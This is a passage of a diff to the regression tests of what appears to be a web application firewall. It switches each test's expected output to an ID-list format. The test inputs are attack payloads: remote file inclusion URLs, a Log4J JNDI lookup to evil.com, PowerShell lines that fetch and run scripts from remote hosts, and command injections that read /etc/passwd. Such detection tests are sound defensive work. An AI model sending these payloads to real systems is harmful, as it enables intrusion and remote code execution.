"/get?x=ldap://127.0.0.1/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 19 desc: Remote File Inclusion Attack (931130) stages: @@ -287,7 +305,8 @@ tests: uri: "/get?x=jar:http://evil.co/b.zip!a" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages: @@ -302,7 +321,8 @@ tests: uri: "/get?x=url:file://etc/services" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages: @@ -317,7 +337,8 @@ tests: uri: "/get?x=local_file://something" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages: @@ -332,4 +353,5 @@ tests: uri: "/get?x=url:file:///etc/passwd" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 1685c4137..b57d42210 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -17,4 +17,5 @@ tests: uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" version: HTTP/1.1 output: - log_contains: id "931131" + log: + expect_ids: [931131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index c7b1c1167..4e4f74a71 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' version: "HTTP/1.1" output: - no_log_contains: "id \"932120\"" + log: + no_expect_ids: [932120] - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: @@ -78,4 +82,5 @@ tests: data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' version: "HTTP/1.1" output: - log_contains: id "932120" + log: + expect_ids: [932120] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index efd4198ee..db6723858 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] - test_id: 2 desc: "Test for BB finding VYYFBP5V" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] - test_id: 3 desc: "Test for BB finding VYYFBP5V" stages: @@ -48,4 +50,5 @@ tests: data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index 6cce5b313..6c38dc749 100755 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932130-1=$(cmd)" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: data: "932130-2=${cmd}" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 5 stages: - input: @@ -77,7 +81,8 @@ tests: data: "932130-5=Some text (in brackets)." version: "HTTP/1.1" output: - no_log_contains: 'id "932130"' + log: + no_expect_ids: [932130] - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: @@ -94,7 +99,8 @@ tests: data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 7 desc: "Unix command injection" stages: @@ -110,7 +116,8 @@ tests: data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: @@ -126,7 +133,8 @@ tests: uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: @@ -142,7 +150,8 @@ tests: uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: @@ -158,7 +167,8 @@ tests: uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" version: HTTP/1.0 output: - no_log_contains: id "932130" + log: + no_expect_ids: [932130] - test_id: 11 desc: "Unix command injection - bracket bypass" stages: @@ -173,7 +183,8 @@ tests: uri: "/get?s=/etc/pas[s]wd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 12 desc: "Unix command injection - bracket bypass" stages: @@ -188,7 +199,8 @@ tests: uri: "/get?s=/etc/%5Bp%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 13 desc: "Unix command injection - bracket bypass" stages: @@ -203,7 +215,8 @@ tests: uri: "/get?s=/etc/%5B!q%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 14 desc: "Unix command injection - bracket bypass" stages: @@ -218,7 +231,8 @@ tests: uri: "/get?s=/etc/%5Bm-z%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 15 desc: "Unix command injection - bracket bypass" stages: @@ -233,7 +247,8 @@ tests: uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 16 desc: "Unix command injection - bracket bypass" stages: @@ -248,4 +263,5 @@ tests: uri: "/get?exec=/bi%5Bn%5D/bash" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index 155462cee..e7e479eb2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "932131" + log: + expect_ids: [932131] - test_id: 2 desc: False positive against Facebook for Android user agent stages: @@ -33,4 +34,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932131" + log: + no_expect_ids: [932131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml index b7dff9301..e38f63c71 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 2 desc: for %% stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 3 desc: for /d stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 4 desc: for /r stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 5 desc: for /l stages: @@ -78,7 +82,8 @@ tests: uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 6 desc: for /f .. fileset stages: @@ -93,7 +98,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 7 desc: for /f .. "string" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 8 desc: for /f .. 'command' stages: @@ -123,7 +130,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 9 desc: for /f .. `command` stages: @@ -138,7 +146,8 @@ tests: uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 10 desc: imported test stages: @@ -153,7 +162,8 @@ tests: uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 11 desc: imported test stages: @@ -168,7 +178,8 @@ tests: uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 12 desc: imported test stages: @@ -183,7 +194,8 @@ tests: uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 13 desc: imported test stages: @@ -198,7 +210,8 @@ tests: uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 14 desc: imported test stages: @@ -213,7 +226,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 15 desc: imported test stages: @@ -228,7 +242,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 16 desc: imported test stages: @@ -243,7 +258,8 @@ tests: uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 17 desc: imported test stages: @@ -258,7 +274,8 @@ tests: uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 18 desc: imported test stages: @@ -273,7 +290,8 @@ tests: uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 19 desc: imported test stages: @@ -288,7 +306,8 @@ tests: uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 20 desc: imported test stages: @@ -303,7 +322,8 @@ tests: uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 21 desc: imported test stages: @@ -318,7 +338,8 @@ tests: uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 22 desc: imported test stages: @@ -333,7 +354,8 @@ tests: uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 23 desc: imported test stages: @@ -348,7 +370,8 @@ tests: uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 24 desc: imported test stages: @@ -363,7 +386,8 @@ tests: uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 25 desc: imported test stages: @@ -378,7 +402,8 @@ tests: uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 26 desc: imported test stages: @@ -393,7 +418,8 @@ tests: uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 27 desc: imported test stages: @@ -408,7 +434,8 @@ tests: uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 28 desc: imported test stages: @@ -423,7 +450,8 @@ tests: uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 29 desc: imported test stages: @@ -438,7 +466,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 30 desc: imported test stages: @@ -453,7 +482,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 31 desc: imported test stages: @@ -468,7 +498,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 32 desc: imported test stages: @@ -483,7 +514,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 33 desc: imported test stages: @@ -498,7 +530,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 34 desc: imported test stages: @@ -513,7 +546,8 @@ tests: uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 35 desc: imported test stages: @@ -528,7 +562,8 @@ tests: uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 36 desc: imported test stages: @@ -543,7 +578,8 @@ tests: uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 37 desc: imported test stages: @@ -558,7 +594,8 @@ tests: uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 38 desc: imported test stages: @@ -573,7 +610,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 39 desc: imported test stages: @@ -588,7 +626,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 40 desc: imported test stages: @@ -603,7 +642,8 @@ tests: uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 41 desc: imported test stages: @@ -618,7 +658,8 @@ tests: uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 42 desc: imported test stages: @@ -633,7 +674,8 @@ tests: uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 43 desc: imported test stages: @@ -648,7 +690,8 @@ tests: uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 44 desc: imported test stages: @@ -663,7 +706,8 @@ tests: uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 45 desc: imported test stages: @@ -678,7 +722,8 @@ tests: uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 46 desc: imported test stages: @@ -693,7 +738,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 47 desc: imported test stages: @@ -708,7 +754,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 48 desc: imported test stages: @@ -723,7 +770,8 @@ tests: uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 49 desc: imported test stages: @@ -738,7 +786,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 50 desc: imported test stages: @@ -753,7 +802,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 51 desc: imported test stages: @@ -768,7 +818,8 @@ tests: uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 52 desc: imported test stages: @@ -783,7 +834,8 @@ tests: uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 53 desc: imported test stages: @@ -798,7 +850,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 54 desc: imported test stages: @@ -813,7 +866,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 55 desc: imported test stages: @@ -828,7 +882,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 56 desc: imported test stages: @@ -843,7 +898,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 57 desc: imported test stages: @@ -858,7 +914,8 @@ tests: uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 58 desc: imported test stages: @@ -873,7 +930,8 @@ tests: uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 59 desc: imported test stages: @@ -888,7 +946,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 60 desc: imported test stages: @@ -903,7 +962,8 @@ tests: uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 61 desc: imported test stages: @@ -918,7 +978,8 @@ tests: uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 62 desc: imported test stages: @@ -933,7 +994,8 @@ tests: uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 63 desc: imported test stages: @@ -948,7 +1010,8 @@ tests: uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 64 desc: imported test stages: @@ -963,7 +1026,8 @@ tests: uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 65 desc: imported test stages: @@ -978,7 +1042,8 @@ tests: uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 66 desc: imported test stages: @@ -993,7 +1058,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 67 desc: imported test stages: @@ -1008,7 +1074,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 68 desc: imported test stages: @@ -1023,7 +1090,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 69 desc: imported test stages: @@ -1038,7 +1106,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 70 desc: imported test stages: @@ -1053,7 +1122,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 71 desc: imported test stages: @@ -1068,7 +1138,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 72 desc: imported test stages: @@ -1083,7 +1154,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 73 desc: imported test stages: @@ -1098,7 +1170,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 74 desc: imported test stages: @@ -1113,7 +1186,8 @@ tests: uri: 